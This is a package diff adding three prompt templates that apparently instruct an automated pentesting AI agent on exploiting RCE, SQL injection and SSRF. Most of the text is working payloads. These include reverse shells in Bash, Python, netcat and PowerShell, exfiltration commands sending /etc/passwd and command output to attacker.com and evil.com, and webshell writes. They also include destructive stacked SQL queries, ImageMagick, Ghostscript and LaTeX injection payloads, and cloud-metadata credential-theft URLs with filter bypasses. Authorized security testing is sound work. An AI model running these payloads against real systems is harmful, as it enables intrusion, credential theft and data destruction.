strix-agent 0.1.1__py3-none-any.whl

strix/prompts/vulnerabilities/rce.jinja

@@ -0,0 +1,222 @@
+<rce_vulnerability_guide>
+<title>REMOTE CODE EXECUTION (RCE) - MASTER EXPLOITATION</title>
+
+<critical>RCE is the holy grail - complete system compromise. Modern RCE requires sophisticated bypass techniques.</critical>
+
+<common_injection_contexts>
+- System commands: ping, nslookup, traceroute, whois
+- File operations: upload, download, convert, resize
+- PDF generators: wkhtmltopdf, phantomjs
+- Image processors: ImageMagick, GraphicsMagick
+- Media converters: ffmpeg, sox
+- Archive handlers: tar, zip, 7z
+- Version control: git, svn operations
+- LDAP queries
+- Database backup/restore
+- Email sending functions
+</common_injection_contexts>
+
+<detection_methods>
+<time_based>
+- Linux/Unix: ;sleep 10 # | sleep 10 # `sleep 10` $(sleep 10)
+- Windows: & ping -n 10 127.0.0.1 & || ping -n 10 127.0.0.1 ||
+- PowerShell: ;Start-Sleep -s 10 #
+</time_based>
+
+<dns_oob>
+- nslookup $(whoami).attacker.com
+- ping $(hostname).attacker.com
+- curl http://$(cat /etc/passwd | base64).attacker.com
+</dns_oob>
+
+<output_based>
+- Direct: ;cat /etc/passwd
+- Encoded: ;cat /etc/passwd | base64
+- Hex: ;xxd -p /etc/passwd
+</output_based>
+</detection_methods>
+
+<command_injection_vectors>
+<basic_payloads>
+; id
+| id
+|| id
+& id
+&& id
+`id`
+$(id)
+${IFS}id
+</basic_payloads>
+
+<bypass_techniques>
+- Space bypass: ${IFS}, $IFS$9, <, %09 (tab)
+- Blacklist bypass: w'h'o'a'm'i, w"h"o"a"m"i
+- Command substitution: $(a=c;b=at;$a$b /etc/passwd)
+- Encoding: echo 'aWQ=' | base64 -d | sh
+- Case variation: WhOaMi (Windows)
+</bypass_techniques>
+</command_injection_vectors>
+
+<language_specific_rce>
+<php>
+- eval($_GET['cmd'])
+- system(), exec(), shell_exec(), passthru()
+- preg_replace with /e modifier
+- assert() with string input
+- unserialize() exploitation
+</php>
+
+<python>
+- eval(), exec()
+- subprocess.call(shell=True)
+- os.system()
+- pickle deserialization
+- yaml.load()
+</python>
+
+<java>
+- Runtime.getRuntime().exec()
+- ProcessBuilder
+- ScriptEngine eval
+- JNDI injection
+- Expression Language injection
+</java>
+
+<nodejs>
+- eval()
+- child_process.exec()
+- vm.runInContext()
+- require() pollution
+</nodejs>
+</language_specific_rce>
+
+<advanced_exploitation>
+<polyglot_payloads>
+Works in multiple contexts:
+;id;#' |id| #" |id| #
+${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
+</polyglot_payloads>
+
+<blind_rce>
+- DNS exfiltration: $(whoami).evil.com
+- HTTP callbacks: curl evil.com/$(id)
+- Time delays for boolean extraction
+- Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
+</blind_rce>
+
+<chained_exploitation>
+1. Command injection → Write webshell
+2. File upload → LFI → RCE
+3. XXE → SSRF → internal RCE
+4. SQLi → INTO OUTFILE → RCE
+</chained_exploitation>
+</advanced_exploitation>
+
+<specific_contexts>
+<imagemagick>
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://evil.com/image.jpg"|id > /tmp/output")'
+pop graphic-context
+</imagemagick>
+
+<ghostscript>
+%!PS
+/outfile (%pipe%id) (w) file def
+</ghostscript>
+
+<ffmpeg>
+#EXTM3U
+#EXT-X-TARGETDURATION:1
+#EXTINF:1.0,
+concat:|file:///etc/passwd
+</ffmpeg>
+
+<latex>
+\immediate\write18{id > /tmp/pwn}
+\input{|"cat /etc/passwd"}
+</latex>
+</specific_contexts>
+
+<container_escapes>
+<docker>
+- Privileged containers: mount host filesystem
+- Docker.sock exposure
+- Kernel exploits
+- /proc/self/exe overwrite
+</docker>
+
+<kubernetes>
+- Service account tokens
+- Kubelet API access
+- Container breakout to node
+</kubernetes>
+</container_escapes>
+
+<waf_bypasses>
+- Unicode normalization
+- Double URL encoding
+- Case variation mixing
+- Null bytes: %00
+- Comments: /**/i/**/d
+- Alternative commands: hostname vs uname -n
+- Path traversal: /usr/bin/id vs id
+</waf_bypasses>
+
+<post_exploitation>
+<reverse_shells>
+Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
+Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
+Netcat: nc -e /bin/sh attacker 4444
+PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+</reverse_shells>
+
+<persistence>
+- Cron jobs
+- SSH keys
+- Web shells
+- Systemd services
+</persistence>
+</post_exploitation>
+
+<validation>
+To confirm RCE:
+1. Execute unique command (id, hostname)
+2. Demonstrate file system access
+3. Show command output retrieval
+4. Achieve reverse shell
+5. Prove consistent execution
+</validation>
+
+<false_positives>
+NOT RCE if:
+- Only crashes application
+- Limited to specific commands
+- Sandboxed/containerized properly
+- No actual command execution
+- Output not retrievable
+</false_positives>
+
+<impact>
+- Complete system compromise
+- Data exfiltration
+- Lateral movement
+- Backdoor installation
+- Service disruption
+</impact>
+
+<pro_tips>
+1. Try all delimiters: ; | || & &&
+2. Test both Unix and Windows commands
+3. Use time-based for blind confirmation
+4. Chain with other vulnerabilities
+5. Check sudo permissions post-exploit
+6. Look for SUID binaries
+7. Test command substitution variants
+8. Monitor DNS for blind RCE
+9. Try polyglot payloads first
+10. Document full exploitation path
+</pro_tips>
+
+<remember>Modern RCE often requires chaining vulnerabilities and bypassing filters. Focus on blind techniques, WAF bypasses, and achieving stable shells. Always test in the specific context - ImageMagick RCE differs from command injection.</remember>
+</rce_vulnerability_guide>

strix/prompts/vulnerabilities/sql_injection.jinja

@@ -0,0 +1,216 @@
+<sql_injection_guide>
+<title>SQL INJECTION - MASTER CLASS TECHNIQUES</title>
+
+<critical>SQL Injection = direct database access = game over.</critical>
+
+<injection_points>
+- URL parameters: ?id=1
+- POST body parameters
+- HTTP headers: User-Agent, Referer, X-Forwarded-For
+- Cookie values
+- JSON/XML payloads
+- File upload names
+- Session identifiers
+</injection_points>
+
+<detection_techniques>
+- Time-based: ' AND SLEEP(5)--
+- Boolean-based: ' AND '1'='1 vs ' AND '1'='2
+- Error-based: ' (provoke verbose errors)
+- Out-of-band: DNS/HTTP callbacks
+- Differential response: content length changes
+- Second-order: stored and triggered later
+</detection_techniques>
+
+<uncommon_contexts>
+- ORDER BY: (CASE WHEN condition THEN 1 ELSE 2 END)
+- GROUP BY: GROUP BY id HAVING 1=1--
+- INSERT: INSERT INTO users VALUES (1,'admin',(SELECT password FROM admins))--
+- UPDATE: UPDATE users SET email=(SELECT @@version) WHERE id=1
+- Functions: WHERE MATCH(title) AGAINST((SELECT password FROM users LIMIT 1))
+</uncommon_contexts>
+
+<basic_payloads>
+<union_based>
+' UNION SELECT null--
+' UNION SELECT null,null--
+' UNION SELECT 1,2,3--
+' UNION SELECT 1,@@version,3--
+' UNION ALL SELECT 1,database(),3--
+</union_based>
+
+<error_based>
+' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
+' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
+' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
+</error_based>
+
+<blind_boolean>
+' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
+' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--
+' AND (SELECT COUNT(*) FROM users)>5--
+</blind_boolean>
+
+<blind_time>
+' AND IF(1=1,SLEEP(5),0)--
+' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
+'; WAITFOR DELAY '0:0:5'-- (MSSQL)
+'; SELECT pg_sleep(5)-- (PostgreSQL)
+</blind_time>
+</basic_payloads>
+
+<advanced_techniques>
+<stacked_queries>
+'; DROP TABLE users--
+'; INSERT INTO admins VALUES ('hacker','password')--
+'; UPDATE users SET password='hacked' WHERE username='admin'--
+</stacked_queries>
+
+<out_of_band>
+MySQL:
+' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
+' UNION SELECT LOAD_FILE('/etc/passwd')--
+
+MSSQL:
+'; EXEC xp_dirtree '\\attacker.com\share'--
+'; EXEC xp_cmdshell 'nslookup attacker.com'--
+
+PostgreSQL:
+'; CREATE EXTENSION dblink; SELECT dblink_connect('host=attacker.com')--
+</out_of_band>
+
+<file_operations>
+MySQL:
+' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
+' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
+
+MSSQL:
+'; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
+
+PostgreSQL:
+'; CREATE TABLE test(data text); COPY test FROM '/etc/passwd'--
+</file_operations>
+</advanced_techniques>
+
+<filter_bypasses>
+<space_bypass>
+- Comments: /**/
+- Parentheses: UNION(SELECT)
+- Backticks: UNION`SELECT`
+- Newlines: %0A, %0D
+- Tabs: %09
+</space_bypass>
+
+<keyword_bypass>
+- Case variation: UnIoN SeLeCt
+- Comments: UN/**/ION SE/**/LECT
+- Encoding: %55nion %53elect
+- Double words: UNUNIONION SESELECTLECT
+</keyword_bypass>
+
+<waf_bypasses>
+- HTTP Parameter Pollution: id=1&id=' UNION SELECT
+- JSON/XML format switching
+- Chunked encoding
+- Unicode normalization
+- Scientific notation: 1e0 UNION SELECT
+</waf_bypasses>
+</filter_bypasses>
+
+<specific_databases>
+<mysql>
+- Version: @@version
+- Database: database()
+- User: user(), current_user()
+- Tables: information_schema.tables
+- Columns: information_schema.columns
+</mysql>
+
+<mssql>
+- Version: @@version
+- Database: db_name()
+- User: user_name(), system_user
+- Tables: sysobjects WHERE xtype='U'
+- Enable xp_cmdshell: sp_configure 'xp_cmdshell',1;RECONFIGURE
+</mssql>
+
+<postgresql>
+- Version: version()
+- Database: current_database()
+- User: current_user
+- Tables: pg_tables
+- Command execution: CREATE EXTENSION
+</postgresql>
+
+<oracle>
+- Version: SELECT banner FROM v$version
+- Database: SELECT ora_database_name FROM dual
+- User: SELECT user FROM dual
+- Tables: all_tables
+</oracle>
+</specific_databases>
+
+<nosql_injection>
+<mongodb>
+{"username": {"$ne": null}, "password": {"$ne": null}}
+{"$where": "this.username == 'admin'"}
+{"username": {"$regex": "^admin"}}
+</mongodb>
+
+<graphql>
+{users(where:{OR:[{id:1},{id:2}]}){id,password}}
+{__schema{types{name,fields{name}}}}
+</graphql>
+</nosql_injection>
+
+<automation>
+SQLMap flags:
+- Risk/Level: --risk=3 --level=5
+- Bypass WAF: --tamper=space2comment,between
+- OS Shell: --os-shell
+- Database dump: --dump-all
+- Specific technique: --technique=T (time-based)
+</automation>
+
+<validation>
+To confirm SQL injection:
+1. Demonstrate database version extraction
+2. Show database/table enumeration
+3. Extract actual data
+4. Prove query manipulation
+5. Document consistent exploitation
+</validation>
+
+<false_positives>
+NOT SQLi if:
+- Only generic errors
+- No time delays work
+- Same response for all payloads
+- Parameterized queries properly used
+- Input validation effective
+</false_positives>
+
+<impact>
+- Database content theft
+- Authentication bypass
+- Data manipulation
+- Command execution (xp_cmdshell)
+- File system access
+- Complete database takeover
+</impact>
+
+<pro_tips>
+1. Always try UNION SELECT first
+2. Use sqlmap for automation
+3. Test all HTTP headers
+4. Try different encodings
+5. Check for second-order SQLi
+6. Test JSON/XML parameters
+7. Look for error messages
+8. Try time-based for blind
+9. Check INSERT/UPDATE contexts
+10. Focus on data extraction
+</pro_tips>
+
+<remember>Modern SQLi requires bypassing WAFs and dealing with complex queries. Focus on extracting sensitive data - passwords, API keys, PII. Time-based blind SQLi works when nothing else does.</remember>
+</sql_injection_guide>

strix/prompts/vulnerabilities/ssrf.jinja

@@ -0,0 +1,168 @@
+<ssrf_vulnerability_guide>
+<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
+
+<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
+
+<common_injection_points>
+- URL parameters: url=, link=, path=, src=, href=, uri=
+- File import/export features
+- Webhooks and callbacks
+- PDF generators (wkhtmltopdf)
+- Image processing (ImageMagick)
+- Document parsers
+- Payment gateways (IPN callbacks)
+- Social media card generators
+- URL shorteners/expanders
+</common_injection_points>
+
+<hidden_contexts>
+- Referer headers in analytics
+- Link preview generation
+- RSS/Feed fetchers
+- Repository cloning (Git/SVN)
+- Package managers (npm, pip)
+- Calendar invites (ICS files)
+- OAuth redirect_uri
+- SAML endpoints
+- GraphQL field resolvers
+</hidden_contexts>
+
+<cloud_metadata>
+<aws>
+Legacy: http://169.254.169.254/latest/meta-data/
+IMDSv2: Requires token but check if app proxies headers
+Key targets: /iam/security-credentials/, /user-data/
+</aws>
+
+<google_cloud>
+http://metadata.google.internal/computeMetadata/v1/
+Requires: Metadata-Flavor: Google header
+Target: /instance/service-accounts/default/token
+</google_cloud>
+
+<azure>
+http://169.254.169.254/metadata/instance?api-version=2021-02-01
+Requires: Metadata: true header
+OAuth: /metadata/identity/oauth2/token
+</azure>
+</cloud_metadata>
+
+<internal_services>
+<port_scanning>
+Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
+</port_scanning>
+
+<service_fingerprinting>
+- Elasticsearch: http://localhost:9200/_cat/indices
+- Redis: dict://localhost:6379/INFO
+- MongoDB: http://localhost:27017/test
+- Docker: http://localhost:2375/v1.24/containers/json
+- Kubernetes: https://kubernetes.default.svc/api/v1/
+</service_fingerprinting>
+</internal_services>
+
+<protocol_exploitation>
+<gopher>
+Redis RCE, SMTP injection, FastCGI exploitation
+</gopher>
+
+<file>
+file:///etc/passwd, file:///proc/self/environ
+</file>
+
+<dict>
+dict://localhost:11211/stat (Memcached)
+</dict>
+</protocol_exploitation>
+
+<bypass_techniques>
+<dns_rebinding>
+First request → your server, second → 127.0.0.1
+</dns_rebinding>
+
+<encoding_tricks>
+- Decimal IP: http://2130706433/ (127.0.0.1)
+- Octal: http://0177.0.0.1/
+- Hex: http://0x7f.0x0.0x0.0x1/
+- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
+</encoding_tricks>
+
+<url_parser_confusion>
+- Authority: http://expected@evil/
+- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
+</url_parser_confusion>
+
+<redirect_chains>
+302 → yourserver.com → 169.254.169.254
+</redirect_chains>
+</bypass_techniques>
+
+<advanced_techniques>
+<blind_ssrf>
+- DNS exfiltration: http://$(hostname).attacker.com/
+- Timing attacks for network mapping
+- Error-based detection
+</blind_ssrf>
+
+<ssrf_to_rce>
+- Redis: gopher://localhost:6379/ (cron injection)
+- Memcached: gopher://localhost:11211/
+- FastCGI: gopher://localhost:9000/
+</ssrf_to_rce>
+</advanced_techniques>
+
+<filter_bypasses>
+<localhost>
+127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
+</localhost>
+
+<parser_differentials>
+http://evil.com#@good.com/, http:evil.com
+</parser_differentials>
+
+<protocols>
+dict://, gopher://, ftp://, file://, jar://, netdoc://
+</protocols>
+</filter_bypasses>
+
+<validation_techniques>
+To confirm SSRF:
+1. External callbacks (DNS/HTTP)
+2. Internal network access (different responses)
+3. Time-based detection (timeouts)
+4. Cloud metadata retrieval
+5. Protocol differentiation
+</validation_techniques>
+
+<false_positive_indicators>
+NOT SSRF if:
+- Only client-side redirects
+- Whitelist properly blocking
+- Generic errors for all URLs
+- No outbound requests made
+- Same-origin policy enforced
+</false_positive_indicators>
+
+<impact_demonstration>
+- Cloud credential theft (AWS/GCP/Azure)
+- Internal admin panel access
+- Port scanning results
+- SSRF to RCE chain
+- Data exfiltration
+</impact_demonstration>
+
+<pro_tips>
+1. Always check cloud metadata first
+2. Chain with other vulns (SSRF + XXE)
+3. Use time delays for blind SSRF
+4. Try all protocols, not just HTTP
+5. Automate internal network scanning
+6. Check parser quirks (language-specific)
+7. Monitor DNS for blind confirmation
+8. Try IPv6 (often forgotten)
+9. Abuse redirects for filter bypass
+10. SSRF can be in any URL-fetching feature
+</pro_tips>
+
+<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
+</ssrf_vulnerability_guide>